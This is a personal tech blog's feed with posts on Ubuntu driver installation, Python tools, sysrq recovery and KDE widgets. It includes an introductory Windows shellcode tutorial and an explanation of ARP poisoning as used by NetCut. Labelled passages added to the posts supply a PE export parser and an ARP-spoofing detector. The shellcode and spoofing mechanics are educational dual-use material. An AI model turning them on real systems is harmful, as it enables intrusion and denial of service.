Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-85162736476681526382012-10-03T00:07:00.001-07:002014-03-07T06:32:31.278-08:00Ubuntu 12.04 notes.Ubuntu 12.04 has been released for a while. I recently installed this version and almost everything works great except the video and wireless drivers. I googled for a very long time and read many threads to solve these two problems. Therefore, this post is just to remind me how I solved them.<br />
<h3>
Video Drivers:</h3>
<div>
My notebook's graphics card is an ATI Radeon HD 4300. If you want to check which graphics card your computer is using, just type:</div>
<div>
<hr />
<code>lspci -vnn | grep VGA</code>
<br />
<hr />
<div>
and it will show you the information you need.</div>
<div>
Actually, there are many ways to install graphics drivers. The following is just how I set up my video driver.</div>
<div>
First, make sure you haven't installed an old fglrx driver. If you have, simply type:</div>
<div>
<hr />
<code>sudo apt-get remove --purge fglrx* fglrx_* fglrx-amdcccle* fglrx-dev*</code><br />
<hr />
</div>
<div>
This command removes the fglrx driver that your system is currently using.</div>
<div>
After removing the old driver, download the binary file from the AMD support web site:</div>
<div>
<a href="http://support.amd.com/us/Pages/AMDSupportHub.aspx">http://support.amd.com/us/Pages/AMDSupportHub.aspx</a>
</div>
In my case, the binary file I need to download is as follows.
<a href="http://support.amd.com/us/gpudownload/windows/previous/12/Pages/radeon_linux.aspx?os=Linux%20x86&rev=12.4">http://support.amd.com/us/gpudownload/windows/previous/12/Pages/radeon_linux.aspx?os=Linux%20x86&rev=12.4</a>
<br />
<div>
After downloading the binary file, type:</div>
<hr />
<div>
<code>chmod +x amd-driver-installer-12-4-x86.x86_64.run</code><br />
<code>./amd-driver-installer-12-4-x86.x86_64.run --buildpkg Ubuntu/precise</code><br />
<code>sudo dpkg -i *.deb</code></div>
<hr />
That's it. Reboot your system and the fglrx driver should be installed properly.<br />
For more detail, check the following two reference websites.<br />
<a href="https://help.ubuntu.com/community/BinaryDriverHowto/ATI">https://help.ubuntu.com/community/BinaryDriverHowto/ATI</a><br />
<a href="http://askubuntu.com/questions/124292/what-is-the-correct-way-to-install-ati-catalyst-video-drivers">http://askubuntu.com/questions/124292/what-is-the-correct-way-to-install-ati-catalyst-video-drivers</a><br />
<h3>
Wireless Drivers:</h3>
<div>
My notebook's wireless NIC is a Broadcom BCM4312. Again, if you want to know which chipset your device is using, type:</div>
<div>
<hr />
<code>
lspci -vnn | grep Network
</code>
<br />
<hr />
</div>
And it will print out the information you need.
After knowing the chipset, it's time to find out what kind of driver/module I need.
Actually, installing the new wireless driver is very simple in ubuntu 12.04. Just type
<code>sudo apt-get install backport-module-cw-$kernel_version</code>
where kernel_version is your kernel version, which you can check with the uname command.
After this instruction, it will install almost all the wireless modules (atheros or broadcom chipsets) from a newer kernel version.
Hope this post can help others. :)
</div>
Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-60559903155270300022012-05-19T06:27:00.002-07:002014-03-08T08:47:31.399-08:00windows shellcode 1: IntroductionOk, this is another shellcode tutorial. However, this time I'm gonna focus on windows shellcoding technique.<br />
<br />
In the previous shellcode tutorial, I used linux as my environment. After researching and googling for a while, I think it's time to write something about windows shellcode.<br />
<br />
The most significant difference between linux shellcode and windows shellcode is that when writing linux shellcode we use system calls to achieve our goal. However, in windows, the system call numbers vary between versions. Therefore, when writing windows shellcode, we have to use the windows API to achieve the goal.<br />
<br />
There are several ways to get a windows API address, and the simplest one is using GetProcAddress() and LoadLibraryA() from kernel32.dll.<br />
I use the following C program to demonstrate how to use these two APIs.<br />
<br />
<br />
<pre class="brush: cpp">
#include <windows.h>
#include <stdio.h>

int main(void) {
    /* LoadLibraryA returns the module handle; GetProcAddress resolves an export by name. */
    HMODULE k32 = LoadLibraryA("kernel32.dll");
    FARPROC api_addr = NULL;
    if (k32 != NULL)
        api_addr = GetProcAddress(k32, "ExitProcess");
    /* FARPROC is a pointer, so print it with %p instead of forcing it into an unsigned int. */
    printf("address %p\n", (void *)api_addr);
    return 0;
}
</pre>
<br />
In the above example, api_addr will contain the virtual address of ExitProcess() in the current process.<br />
<i><b>P.S You can get more information of windows API in MSDN.</b></i><br />
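What GetProcAddress does at the file level is walk the DLL's export directory: the name table maps an export name to an ordinal, the ordinal indexes the function RVA table, and the address is ImageBase plus that RVA. The following script is an added example and not code from the original post; it builds a constructed minimal PE32 image (placeholder name fake32.dll, not a real kernel32.dll) so it runs offline, and its parser also handles PE32+ and forwarded exports, which goes beyond the 32-bit case used above. The ImageBase it reports is also the reason a printed address is only valid while the module is mapped at its preferred base.

```python
"""Walk a PE export directory to map an export name to its RVA: the file-level
step behind GetProcAddress. Added example, not code from the original post; the
DLL is a constructed fixture (placeholder name fake32.dll), so it runs offline."""
import struct


def build_minimal_dll(exports, image_base=0x10000000):
    """Constructed fixture: PE32 headers plus one '.edata' section holding an
    export directory for {name: rva}. Parseable, not loadable."""
    sec_rva, sec_off, n = 0x1000, 0x200, len(exports)
    names = sorted(exports)                 # the name table is kept sorted
    func_tbl = sec_rva + 40                 # tables follow the 40-byte directory
    name_tbl, ord_tbl = func_tbl + 4 * n, func_tbl + 8 * n
    str_rva = ord_tbl + 2 * n
    strings, name_rvas = b"fake32.dll\0", []   # constructed module name first
    for nm in names:
        name_rvas.append(str_rva + len(strings))
        strings += nm.encode() + b"\0"
    body = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, str_rva, 1, n, n,
                       func_tbl, name_tbl, ord_tbl)
    body += b"".join(struct.pack("<I", exports[nm]) for nm in names)
    body += b"".join(struct.pack("<I", r) for r in name_rvas)
    body += b"".join(struct.pack("<H", i) for i in range(n)) + strings
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)
    opt = struct.pack("<HBBIIIIIIIII", 0x10B, 0, 0, 0, 0x200, 0, 0,
                      0x1000, 0x1000, image_base, 0x1000, 0x200)
    opt += struct.pack("<HHHHHHIIIIHHIIIIII", 4, 0, 0, 0, 4, 0, 0, 0x2000,
                       0x200, 0, 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += struct.pack("<II", sec_rva, len(body)) + b"\0" * 120  # data dir 0
    sec = struct.pack("<8sIIIIIIHHI", b".edata", 0x1000, sec_rva, 0x200,
                      sec_off, 0, 0, 0, 0, 0x40000040)
    return (dos + coff + opt + sec).ljust(sec_off, b"\0") + body.ljust(0x200, b"\0")


def _rva_to_offset(sections, rva):
    """Translate an RVA to a file offset through the section table."""
    for vaddr, vsize, raw_off, raw_size in sections:
        if vaddr <= rva < vaddr + max(vsize, raw_size):
            return rva - vaddr + raw_off
    raise ValueError("RVA 0x%x is outside every section" % rva)


def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii")


def parse_exports(data):
    """Return (dll_name, image_base, {export_name: rva or forwarder string})."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                                  # PE32
        image_base, dirs = struct.unpack_from("<I", data, opt + 28)[0], opt + 96
    elif magic == 0x20B:                                # PE32+
        image_base, dirs = struct.unpack_from("<Q", data, opt + 24)[0], opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    exp_rva, exp_size = struct.unpack_from("<II", data, dirs)  # directory 0
    sections = []
    for i in range(nsec):
        _, vsize, vaddr, raw_size, raw_off = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((vaddr, vsize, raw_off, raw_size))
    f = struct.unpack_from("<IIHHIIIIIII", data, _rva_to_offset(sections, exp_rva))
    name_rva, nnames, funcs_rva, names_rva, ords_rva = f[4], f[7], f[8], f[9], f[10]
    funcs_off = _rva_to_offset(sections, funcs_rva)
    names_off = _rva_to_offset(sections, names_rva)
    ords_off = _rva_to_offset(sections, ords_rva)
    exports = {}
    for i in range(nnames):
        ordinal = struct.unpack_from("<H", data, ords_off + 2 * i)[0]
        rva = struct.unpack_from("<I", data, funcs_off + 4 * ordinal)[0]
        name_ptr = struct.unpack_from("<I", data, names_off + 4 * i)[0]
        name = _cstr(data, _rva_to_offset(sections, name_ptr))
        # An RVA pointing back into the export directory is a forwarder
        # string ("OTHER.dll.Func"), not code.
        if exp_rva <= rva < exp_rva + exp_size:
            exports[name] = "-> " + _cstr(data, _rva_to_offset(sections, rva))
        else:
            exports[name] = rva
    return _cstr(data, _rva_to_offset(sections, name_rva)), image_base, exports


def preferred_address(data, export_name):
    """ImageBase + RVA: the value GetProcAddress returns only when the module is
    mapped at its preferred base. Under ASLR the loader usually relocates it,
    which is why a hardcoded address (the post's 0xdeadbeef) breaks across boots."""
    _, image_base, exports = parse_exports(data)
    rva = exports[export_name]
    if not isinstance(rva, int):
        raise ValueError("%s is forwarded %s" % (export_name, rva))
    return image_base + rva
```

Point `parse_exports` at the bytes of a real DLL and compare its result with what the C program above prints: the two agree only when the module was loaded at ImageBase.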
<br />
After knowing the address of ExitProcess, it's time to write a simple shellcode that will exit the program.<br />
<br />
<pre class="brush: cpp">
.global _main
_main:
pushl $0;
movl $0xdeadbeef, %ebx;
call *%ebx;
</pre>
<br />
In the above assembly code, you have to change $0xdeadbeef to the API address the previous C program printed for you. The reason for using <i><b>call *%ebx</b></i> instead of <i><b>call $0xdeadbeef</b></i> is that the assembler encodes a call to a literal address as a relative call (the displacement is computed from the instruction's own position) rather than a call to that absolute address; therefore the result is not what we expect. I have mentioned this in the previous post. If you want, you can check here.<br />
<a href="http://mike820324.blogspot.com/2011/05/shell-code.html">http://mike820324.blogspot.com/2011/05/shell-code.html</a><br />
<br />
This post is only a brief introduction to windows shellcode; I will post more advanced techniques and shellcode in the coming days.Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-17132422763270464792012-05-15T08:00:00.001-07:002012-05-15T08:01:43.265-07:00Some Great Python ToolsRecently, I started to learn python since it is very convenient and powerful. I'm gonna introduce some great python tools that will be very helpful in future work.<br />
<br />
<span style="font-size: x-large;">1. pip </span><br />
The first one is pip. It is a tool that helps you manage python packages: a great replacement for easy_install, but more powerful.<br />
In Ubuntu, you can simply install pip by typing<br />
<b>sudo apt-get install python-pip</b><br />
<br />
or you can download the package from the following link<br />
<a href="http://pypi.python.org/pypi/pip#downloads">http://pypi.python.org/pypi/pip#downloads</a><br />
untar the file and type<br />
<b>sudo python setup.py install</b><br />
<br />
You can use pip to install python packages either from the web or from tar files.<br />
Type<br />
<b>pip search $PACKAGE_NAME</b><br />
and it will search for the package for you.<br />
<br />
Simply typing<br />
<b>pip install $PACKAGE_NAME</b><br />
will install the package on your system.<br />
<span style="font-size: x-large;"><br /></span><br />
<span style="font-size: x-large;">2. virtualenv & virtualenvwrapper</span><br />
<span style="font-size: large;"><span style="font-size: small;">The second tool I'm gonna introduce is virtualenv. It is a tool that helps you create a virtual python environment </span></span>to solve the consistency problem.<br />
In Ubuntu, simply type<br />
<b>sudo apt-get install python-virtualenv</b><br />
<br />
or you can use pip to install virtualenv, just type<br />
<b>sudo pip install virtualenv</b><br />
<br />
And if you have many projects that need to be managed, virtualenvwrapper is a very good choice. The tool contains some wrapper functions around virtualenv and eases your job.<br />
<br />
If you want to get familiar with virtualenv and virtualenvwrapper, the following links are good tutorials about these tools.<br />
<a href="http://mathematism.com/2009/07/30/presentation-pip-and-virtualenv/">http://mathematism.com/2009/07/30/presentation-pip-and-virtualenv/</a><br />
<a href="http://www.doughellmann.com/articles/pythonmagazine/completely-different/2008-05-virtualenvwrapper/index.html">http://www.doughellmann.com/articles/pythonmagazine/completely-different/2008-05-virtualenvwrapper/index.html</a><br />
<a href="http://simononsoftware.com/virtualenv-tutorial/">http://simononsoftware.com/virtualenv-tutorial/</a><br />
<br />
<span style="font-size: x-large;">3. scapy</span><br />
<span style="font-size: x-large;"><span style="font-size: small;">scapy is a very powerful tool for packet manipulation and packet sniffing. If you want to play with packets, learn some internet protocols, or do some network forensics or pen-testing, it is a very useful tool. The official documentation is a great start to </span></span>learn scapy. I will also post some tutorials on how to use scapy in the future.<br />
<a href="http://www.secdev.org/projects/scapy/doc/index.html">http://www.secdev.org/projects/scapy/doc/index.html</a><br />
<a href="http://fossies.org/dox/scapy-2.2.0/annotated.html">http://fossies.org/dox/scapy-2.2.0/annotated.html</a><br />
<a href="http://www.secdev.org/projects/scapy/">http://www.secdev.org/projects/scapy/</a><br />
<br />
To install, just type<br />
<b>sudo pip install scapy</b><br />
or<br />
<b>sudo apt-get install python-scapy </b><br />
<br />
<span style="font-size: x-large;">4. Django or Pyramid</span><br />
<span style="font-size: small;">Django and Pyramid are both high-level web frameworks for programmers to develop their </span>own web projects in a rapid way. In short, they are "ruby on rails" in python :P<br />
Even though both tools help people organize a web project, they are still different.<br />
A comparison of these two frameworks can be found in these links. <br />
<a href="http://stackoverflow.com/questions/48681/pros-cons-of-django-vs-pylons">http://stackoverflow.com/questions/48681/pros-cons-of-django-vs-pylons</a><br />
<a href="http://xiaonuogantan.wordpress.com/2011/12/24/pyramid-vs-django/">http://xiaonuogantan.wordpress.com/2011/12/24/pyramid-vs-django/</a><br />
<a href="http://www.slideshare.net/whykay/python-ireland-may-2011-what-is-pyramid-and-where-is-it-with-respect-to-django-by-kevin-gill">http://www.slideshare.net/whykay/python-ireland-may-2011-what-is-pyramid-and-where-is-it-with-respect-to-django-by-kevin-gill</a><br />
There are still more, you can just google for that.<br />
<br />
Here are some links that will help you dig deeper into Django.<br />
<a href="https://docs.djangoproject.com/en/1.4/">https://docs.djangoproject.com/en/1.4/</a><br />
<a href="http://www.djangobook.com/en/2.0/">http://www.djangobook.com/en/2.0/</a><br />
<br />
And also some links for Pyramid<br />
<a href="http://docs.pylonsproject.org/en/latest/docs/pyramid.html">http://docs.pylonsproject.org/en/latest/docs/pyramid.html</a><br />
<br />
<span style="font-size: x-large;">5. Scrapy</span><br />
<span style="font-size: small;">Scrapy is a high-level python web crawling framework. If you want to design some web robot or web spider, Scrapy is a good choice.</span><br />
<br />
<span style="font-size: small;">The documentation of scrapy is right here</span><br />
<a href="http://scrapy.org/doc/"><span style="font-size: small;">http://scrapy.org/doc/ </span></a><br />
<br />
To install, just type<br />
<b>sudo pip install scrapy</b><br />
or<br />
<b>sudo apt-get install python-scrapy</b>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-81008691403922595332011-12-27T05:32:00.000-08:002011-12-27T05:36:19.236-08:00What the hell is "NetCut" doing and how to preventNetCut is a program that will help you disconnect other computers in the same subnet of an ethernet network. You can download the program from this link: <a href="http://www.arcai.com/arcai-netcut-faq.html">NetCut.</a><br />
In this post I will describe the technical details of NetCut and how to prevent this kind of program/attack.<br />
<br />
<b>I. Technical Detail About NetCut:</b><br />
NetCut uses a simple technique called "ARP poisoning", sometimes also called "ARP spoofing". It is an attack technique usually used to mount a Man-in-the-Middle attack. Before introducing ARP poisoning, we have to know what ARP is.<br />
ARP is the abbreviation of Address Resolution Protocol. According to wiki, <i>"ARP is a protocol used for resolution of network layer addresses into link layer addresses</i>." That is, ARP maps the IP address of a machine to its MAC address. <br />
Consider the following LAN from Fig. 1:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxdtMtwgr5rPIyxaIvpOnaydcLqIODT0yVr4gzRX2c45ULN_oimAeUBvIsyY_6WxYcjoVuQfctHG5ozmVJM4_Msn_bGD8ek19pGzLba6gfj9oRg8EobM65q85yG20AnTCiwFPoRHZZkGQ/s1600/LAN_example.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxdtMtwgr5rPIyxaIvpOnaydcLqIODT0yVr4gzRX2c45ULN_oimAeUBvIsyY_6WxYcjoVuQfctHG5ozmVJM4_Msn_bGD8ek19pGzLba6gfj9oRg8EobM65q85yG20AnTCiwFPoRHZZkGQ/s640/LAN_example.jpg" width="640" /></a></div>
<span style="font-size: x-small;"><figure 1> Local Area Network Example</span><br />
<br />
Now if Alice wants to send a packet to Bob, Alice's machine will check whether the MAC address for IP 192.168.0.3 exists in its ARP cache table. If it does not, it broadcasts an ARP request asking for the MAC address of 192.168.0.3. When Bob's machine receives the broadcast, it replies with its MAC address to Alice. Fig. 2 shows the communication process.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGxYP-jXPuR32DyM3YL_P_5A7CZNWtlBNXq5xgNmwy94lBY6kjaNGBx2fX4YA4Frk0Wmnp8XOnAmbXFcqlvhZ9ib-W2qrckH0uZnf1Q2ylc2GVy184a3j8_2L-vKGNjAvoQx-CuVyrVE4/s1600/ARP-process.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGxYP-jXPuR32DyM3YL_P_5A7CZNWtlBNXq5xgNmwy94lBY6kjaNGBx2fX4YA4Frk0Wmnp8XOnAmbXFcqlvhZ9ib-W2qrckH0uZnf1Q2ylc2GVy184a3j8_2L-vKGNjAvoQx-CuVyrVE4/s640/ARP-process.jpg" width="640" /></a></div>
<br />
<span style="font-size: x-small;"><figure 2> ARP communication process</span><br />
<br />
After knowing ARP, it's time to introduce the "ARP poisoning attack". Consider the following condition: what if Evil replies to the ARP request before Bob when Alice broadcasts it? In this scenario, Alice's machine will think that the MAC address of IP 192.168.0.3 is 00:00:00:00:00:03 (the MAC address of Evil) instead of 00:00:00:00:00:04 (the MAC address of Bob). Therefore, Alice will send the packet to Evil instead of Bob. Fig. 3 shows the process of this attack.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0CAlFuoScv81JEUZprM1shnQxvOobxwMCf3GVN0BWRdg_Kzpmx4DnhyphenhyphenEP23wk0i1QfxrahE9DKE0-2B_pOWc7pOJc4cK2gM-5poc_BvFfMkwTOiSyROHZad4pzajH1adexK2of3QaYyw/s1600/Arp_spoofing.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0CAlFuoScv81JEUZprM1shnQxvOobxwMCf3GVN0BWRdg_Kzpmx4DnhyphenhyphenEP23wk0i1QfxrahE9DKE0-2B_pOWc7pOJc4cK2gM-5poc_BvFfMkwTOiSyROHZad4pzajH1adexK2of3QaYyw/s640/Arp_spoofing.jpg" width="640" /></a></div>
<br />
<span style="font-size: x-small;"><figure 3> ARP poisoning attack</span><br />
What if Evil sends an ARP reply with a non-existent MAC address for the gateway? Then Alice's machine ends up in a DoS condition. This is how NetCut disconnects other computers in the same subnet. <br />
<br />
<b>II. Prevention of ARP poisoning:</b><br />
The best way to prevent your computer from being poisoned is to use static ARP entries instead of dynamic ones. On both windows and linux systems there is a command called <b>arp</b> which lets you check the ARP cache table and, moreover, change dynamic entries into static ones.<br />
You can also install applications such as <b>arpwatch on unix</b> and <b>Xarp-v2 on windows</b> to defend against this kind of attack.<br />
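What arpwatch does is the check implied above: remember the MAC each IP last answered with and raise an alert when a later reply disagrees, with static entries never being overwritten. The script below is an added example in Python and not part of the original post; it replays constructed tcpdump-style ARP reply lines for the LAN of Fig. 1 and prints the <b>arp -s</b> lines that pin the trusted bindings. The gateway address 192.168.0.1 and its MAC are assumptions, since the post only gives Bob's and Evil's MACs.

```python
"""Flag IP-to-MAC binding changes in observed ARP replies (the check arpwatch
performs). Added example, not code from the original post; the capture below is
constructed in tcpdump's ARP output style, and the gateway binding is assumed."""
import re

# Constructed capture: Bob (...:04) answers for 192.168.0.3, then Evil (...:03)
# claims Bob's IP and the gateway's, and Bob's genuine reply flips it back.
SAMPLE_LOG = """\
10:00:01.000000 ARP, Reply 192.168.0.1 is-at 00:00:00:00:00:01, length 28
10:00:02.000000 ARP, Request who-has 192.168.0.3 tell 192.168.0.2, length 28
10:00:02.000100 ARP, Reply 192.168.0.3 is-at 00:00:00:00:00:04, length 28
10:00:05.000000 ARP, Reply 192.168.0.3 is-at 00:00:00:00:00:03, length 28
10:00:06.000000 ARP, Reply 192.168.0.1 is-at 00:00:00:00:00:03, length 28
10:00:09.000000 ARP, Reply 192.168.0.3 is-at 00:00:00:00:00:04, length 28
"""

REPLY_RE = re.compile(
    r"^(\S+) ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")


def parse_arp_replies(text):
    """Return [(timestamp, ip, mac)] for each ARP reply line; requests are
    ignored because only replies populate a victim's cache."""
    out = []
    for line in text.splitlines():
        m = REPLY_RE.match(line)
        if m:
            out.append((m.group(1), m.group(2), m.group(3).lower()))
    return out


def detect_arp_changes(replies, trusted=None):
    """Replay replies against an ARP table. Returns (alerts, table) where each
    alert is (timestamp, ip, previous_mac, claimed_mac). Entries in `trusted`
    behave like static ARP entries: a conflicting reply is alerted, never adopted."""
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    table = dict(trusted)
    alerts = []
    for ts, ip, mac in replies:
        prev = table.get(ip)
        if prev is None:
            table[ip] = mac                  # first sighting: learn the binding
        elif prev != mac:
            alerts.append((ts, ip, prev, mac))
            if ip not in trusted:
                table[ip] = mac              # a dynamic cache follows the newest reply
    return alerts, table


def flip_flop_counts(alerts):
    """Number of binding changes per IP; repeated flips on one address are the
    pattern a NetCut-style tool produces."""
    counts = {}
    for _, ip, _, _ in alerts:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


def static_arp_commands(trusted):
    """Linux `arp -s` lines that pin the trusted bindings (windows uses the same
    form with dashes in the MAC), the mitigation recommended above."""
    return ["arp -s %s %s" % (ip, mac) for ip, mac in sorted(trusted.items())]


if __name__ == "__main__":
    gateway = {"192.168.0.1": "00:00:00:00:00:01"}   # assumed trusted binding
    alerts, table = detect_arp_changes(parse_arp_replies(SAMPLE_LOG), gateway)
    for alert in alerts:
        print("%s  %s changed %s -> %s" % alert)
    print("changes per IP:", flip_flop_counts(alerts))
    print("\n".join(static_arp_commands(gateway)))
```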
<br />
<b>III. reference website:</b><br />
<a href="http://insecure.org/sploits/arp.games.html">ARP and ICMP redirection</a><br />
<a href="http://en.wikipedia.org/wiki/ARP_spoofing">arp-spoofing wiki</a>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-31352770164000632322011-12-26T08:55:00.000-08:002011-12-27T04:05:10.311-08:00What can you do when linux is not respondingLinux is a very stable system compared to windows (:P). However, even though it is very stable, it will still crash sometimes.<br />
So what can you do if the system has crashed?<br />
<br />
<b><i>1. go to the tty:</i></b><br />
Sometimes it is only the graphical mode that has crashed while the linux kernel and other critical processes are still alive.<br />
If you have encountered this situation, there is no need to reboot your system.<br />
Instead, you can go to a tty to fix the problem.<br />
In a linux system you can go to a tty by pressing [ctrl]+[alt]+[f1~f7].<br />
The default graphical mode is on tty7, that is, you can press [ctrl]+[alt]+[f7] to return to graphical mode. <br />
A tty is a pure command prompt and you can restart the X server from here.<br />
ubuntu 11.10 uses lightdm, so I take lightdm as an example.<br />
Type the following command:<br />
<b>sudo /etc/init.d/lightdm restart</b><br />
That's it, and you will see the graphical mode restart.<br />
<br />
<b><i>2. the magical sysrq:</i></b><br />
If your system crashes and the keyboard does not respond, it's time to use sysrq.<br />
What is sysrq? It is a little button on your keyboard, normally near the delete key. If your system crashes and you cannot enter tty mode, try the following key combinations:<br />
<b>[alt]+[sysrq]+[R]->
[alt]+[sysrq]+[E]->
[alt]+[sysrq]+[I]->
[alt]+[sysrq]+[S]->
[alt]+[sysrq]+[U]->
[alt]+[sysrq]+[B]</b><br />
If everything works, your system will reboot, but it will first sync files to disk and safely kill the processes you were working on.<br />
So what is going on under these key combinations?<br />
The following shows the function of each key.<br />
<br />
a. [alt]+[sysrq]+[R] : take the keyboard out of raw mode so it can send keystrokes to the kernel directly.<br />
b. [alt]+[sysrq]+[E] : send SIGTERM to all processes except init.<br />
c. [alt]+[sysrq]+[I] : send SIGKILL to all processes except init. This kills all processes except init.<br />
d. [alt]+[sysrq]+[S] : sync the buffer cache to the hard disk, so that no data is lost.<br />
e. [alt]+[sysrq]+[U] : remount all mounted filesystems read-only.<br />
f. [alt]+[sysrq]+[B] : reboot the system. <br />
<i>P.S. While using the combinations, go slowly. :P</i><br />
<i>That
is, after using the first combination, wait about 5 seconds and then use
the second one, and so on. If you use the combinations too quickly it is no
different from pressing the power key. </i><br />
<i>The recommended wait times are:</i><br />
<i>R --1 sec--> E --30 sec--> I --10 sec--> S --5 sec--> U --5 sec--> B</i><br />
<i> </i><br />
If you want to know more details about sysrq, the following links have very good explanations.<br />
English version: <br />
<a href="http://ubuntuforums.org/showthread.php?t=617349">Magic sysrq</a><br />
Chinese version:<br />
<i><a href="https://www.deleak.com/blog/2010/10/20/sysrq/">https://www.deleak.com/blog/2010/10/20/sysrq/</a></i>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com2tag:blogger.com,1999:blog-1191178933370250826.post-38833710348196870212011-12-26T08:16:00.000-08:002011-12-26T08:17:11.571-08:00Ubuntu 11.10 NotesIt's been a really long time since I wrote a new post. My school work is fucking busy.<br />
I have had ubuntu 11.10 installed for a while. I decided to write some notes about the installation and configuration process.<br />
<br />
Installing ubuntu 11.10 is quite easy: just put the disk into the computer, follow the steps, and yes, you have installed your ubuntu 11.10.<br />
<br />
<i><b>1. video drivers:</b></i><br />
I'm using an ATI video card and met some problems while using the default video driver.<br />
There are many solutions to this problem. I just post the solution I used:<br />
First, go to the AMD official website and download the video device driver.<br />
The one I'm using is "ati-driver-installer-11-11-x86.x86_64.run".<br />
Type the following commands and reboot, and the video driver is installed.<br />
<span style="font-size: small;"><b><i>mkdir ati-11.11;<br />
cd ati-11.11<br />
wget www2.ati.com/drivers/linux/ati-driver-installer-11-11-x86.x86_64.run<br />
sh ati-driver-installer-11-11-x86.x86_64.run --buildpkg Ubuntu/oneiric<br />
dpkg -i fglrx*.deb<br />
aticonfig --initial -f</i></b></span>
<br />
If you still meet some problems, the following websites may be a good place<br />
to search for solutions.<br />
<a href="https://wiki.ubuntu.com/X/Troubleshooting/FglrxInteferesWithRadeonDriver#Problem:__Need_to_fully_remove_-fglrx_and_reinstall_-ati_from_scratch">x/troubeshooting</a><br />
<a href="http://wiki.cchtml.com/index.php/Ubuntu_Oneiric_Installation_Guide#Installing_Catalyst_Manually_.28from_AMD.2FATI.27s_site.29">ubuntu install guide</a><br />
<a href="http://www.shainmiley.com/wordpress/2011/10/24/ubuntu-11-10-gnome-shell-ati-drivers-multiple-monitors/">ubuntu+gnome shell+ati driver</a><br />
<a href="http://ubuntuforums.org/showthread.php?p=11482929#post11482929">gnome shell doesn't work properly</a>
<br />
<br />
<i><b>2. Installing some applications</b></i><br />
a. upgrade the apps: type the following command to upgrade the applications already installed on the system.<br />
<b>sudo apt-get update && sudo apt-get upgrade</b><br />
<br />
b. install the restricted packages: this will enable you to play some popular music/video formats such as mp3. Type the following command:<br />
<b>sudo apt-get install ubuntu-restricted-extras</b><br />
<br />
c. enable full DVD playback: after that you can watch videos from DVDs.<br />
The instructions are too long, so I post the original links and you can follow the instructions from those websites.<br />
<a href="http://www.ubuntugeek.com/install-mplayer-and-multimedia-codecs-libdvdcss2w32codecsw64codecs-on-ubuntu-11-10-oneiric.html">install libdvdcss</a><br />
<a href="http://www.techdrivein.com/2011/10/15-things-i-did-after-installing-new.html">15 things I did...</a><br />
<br />
d. and more: There are still more applications you may want to install. See this link:<br />
<a href="http://blog.sudobits.com/2011/10/30/best-applications-and-tweaks-for-ubuntu-11-10/">Best applications and tweeks ....</a><br />
<br />
This is pretty much about it.Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-82618698078940921032011-12-09T12:38:00.001-08:002011-12-17T07:33:55.763-08:00wargame competition TaiwanYou can download the questions in the following link: <br />
<a href="http://ppl.ug/ueDHa3zS5Xs/">wargames </a><br />
<br />
<br />
However, the archive file is encrypted; if you want the key, please send me an email.<br />
mike820324@gmail.com <br />
<br />
A description of each question is listed in the t.txt files.<br />
<br />Natatahttp://www.blogger.com/profile/12882754703987950280noreply@blogger.com3tag:blogger.com,1999:blog-1191178933370250826.post-9141941732894624082011-11-28T07:29:00.000-08:002011-11-28T07:29:39.436-08:00ubuntu 11.10 plus plasma widgetI recently installed ubuntu 11.10. I spent some time getting used to the unity interface.<br />
But the unity shell lacks widgets, so I decided to install the plasma-desktop on my ubuntu. :P<br />
<br />
<br />
<span style="font-size: large;"><b>1. install the package by the following command:</b></span><br />
apt-get install plasma-desktop plasma-scriptengine-python<br />
<span style="font-size: large;"><b>2. create launcher to start the plasma desktop:</b></span><br />
type gnome-desktop-item-edit ~/Desktop --create-new<br />
and a dialog box will pop up.<br />
Select "application" in the type field,<br />
fill in "plasma-desktop" or whatever you like in the name field,<br />
fill in "plasma-desktop" in the command field,<br />
and press OK.<br />
P.S. You can also create a launcher to stop plasma by filling the command field with killall plasma-desktop.<br />
